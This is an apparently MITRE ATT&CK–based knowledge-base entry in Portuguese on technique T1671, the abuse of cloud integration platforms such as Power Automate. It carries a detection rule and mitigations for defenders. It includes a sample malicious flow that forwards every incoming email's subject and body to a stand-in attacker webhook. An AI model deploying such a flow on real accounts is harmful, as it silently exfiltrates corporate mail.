# T1671 - Integração de Aplicações Cloud ## Descrição Adversários podem abusar de serviços de integração e automação entre aplicações cloud para executar código arbitrário, mover dados entre ambientes e estabelecer persistência discreta dentro de ecossistemas SaaS corporativos. Plataformas como Microsoft Power Automaté, Zapier, Make (Integromat), AWS EventBridge e Google Cloud Workflows permitem que usuários conectem dezenas de serviços de negócio por meio de fluxos automatizados - criando uma superfície de ataque ampla e frequentemente mal monitorada. Ao comprometer contas com permissão para criar ou modificar fluxos de integração, o adversário pode encadear ações que atravéssam múltiplos serviços: leitura de e-mails corporativos, exfiltração de arquivos do SharePoint, envio de webhooks para infraestrutura externa, criação de usuários em diretórios cloud ou modificação de configurações de segurança sem interação humana visível. Diferentemente de técnicas de execução tradicionais, os fluxos de integração raramente geram alertas em ferramentas EDR convencionais, pois operam na camada de API do provedor cloud. A técnica se relaciona diretamente com [[t1648-serverless-execution|T1648 - Serverless Execution]] quando o adversário usa funções Lambda, Cloud Functions ou Azure Functions como destino das integrações, e com [[t1546-event-triggered-execution|T1546 - Event Triggered Execution]] quando os fluxos são disparados por eventos do ambiente cloud. O resultado é uma cadeia de execução que pode parecer completamente legítima nos logs de auditoria do provedor, especialmente se a conta comprometida for de um administrador ou desenvolvedor habitual. **Contexto Brasil/LATAM:** Empresas brasileiras de médio e grande porte adotaram massivamente plataformas como Microsoft 365 e Google Workspace, expandindo o uso de Power Automaté e Apps Script para automação de processos internos. A falta de governança sobre quais fluxos estão ativos, quem os criou e para onde enviam dados torna essa superfície especialmente atraente para grupos como [[g1015-scattered-spider|Scattered Spider]] e agentes de ameaça voltados a espionagem corporativa. O CERT.br reportou crescimento de comprometimentos de contas cloud em setores financeiro e de telecomúnicações no Brasil ao longo de 2024-2025. ## Attack Flow ```mermaid graph TB A[Comprometimento de Conta Cloud<br/>T1078 - Valid Accounts] --> B[Descoberta de Integrações Existentes<br/>T1580 - Cloud Infrastructure Discovery] B --> C[ESTA TÉCNICA<br/>T1671 - Integração de Aplicações Cloud] C --> D1[Exfiltração via Webhook<br/>T1567 - Exfiltration Over Web Service] C --> D2[Criação de Conta Backdoor<br/>T1136 - Creaté Account] C --> D3[Coleta de Dados Internos<br/>T1213 - Data from Information Repositories] D1 --> E[Impacto / Persistência Silenciosa] D2 --> E D3 --> E ``` ## Como Funciona 1. **Preparação** - O adversário obtém acesso a uma conta com permissão para criar ou editar fluxos de integração (via phishing, credential stuffing ou sessão OAuth comprometida). Realiza reconhecimento para mapear integrações existentes e identificar serviços conectados de alto valor como SharePoint, OneDrive, Gmail ou Salesforce. 2. **Execução** - É criado ou modificado um fluxo de integração que executa ações maliciosas a cada gatilho. O fluxo pode ser disparado por criação de novo arquivo, recebimento de e-mail, login de usuário ou em intervalos regulares. Toda a execução ocorre dentro da infraestrutura do provedor SaaS, sem tocar endpoints monitorados. 3. **Pós-execução** - Os dados coletados são encaminhados via webhook HTTP para um endpoint externo controlado pelo atacante, ou armazenados em um repositório cloud intermediário. O fluxo malicioso pode ser ofuscado com nomes legítimos e oculto entre dezenas de fluxos reais da organização. **Exemplo - Power Automaté malicioso:** ```json { "trigger": "When a new email arrives (V3)", "actions": [ { "type": "HTTP POST", "uri": "https://attacker-webhook.example.com/collect", "body": "@{triggerBody()?['subject']} @{triggerBody()?['body']}" } ] } ``` ## Detecção **Fontes de dados:** Microsoft 365 Unified Audit Log, Google Workspace Admin Audit, AWS CloudTrail (EventBridge), Entra ID Sign-in Logs, Power Automaté Admin Center ```yaml title: Criação Suspeita de Fluxo Power Automaté com Webhook Externo id: a3e7c921-84b2-4f10-bb3a-9d1e2c5f7a08 status: experimental logsource: category: cloud product: microsoft365 detection: selection: EventSource: "PowerAutomaté" Operation: "FlowCreated" filter_external_action: ConnectorName: "HTTP" ActionType: "Http" condition: selection and filter_external_action falsepositives: - Fluxos legítimos de integração criados por TI - Automações de negócio aprovadas level: medium tags: - attack.execution - attack.t1671 ``` ## Mitigação | Mitigação | Recomendação Prática | |-----------|---------------------| | [[m1047-audit\|M1047 - Audit]] | Revisar regularmente todos os fluxos ativos no Power Automaté Admin Center e equivalentes; exportar inventário e comparar com baseline aprovado | | [[m1018-user-account-management\|M1018 - User Account Management]] | Restringir a criação de conectores HTTP externos e fluxos com ações de envio de dados a usuários aprovados; exigir aprovação de administrador para novos fluxos em produção | | [[m1026-privileged-account-management\|M1026 - Privileged Account Management]] | Aplicar MFA e revisão de sessão em contas com permissão de administrador de fluxos; desabilitar contas de serviço não utilizadas com acesso a integrações | ## Referências *Fonte: [MITRE ATT&CK - T1671](https://attack.mitre.org/techniques/T1671)*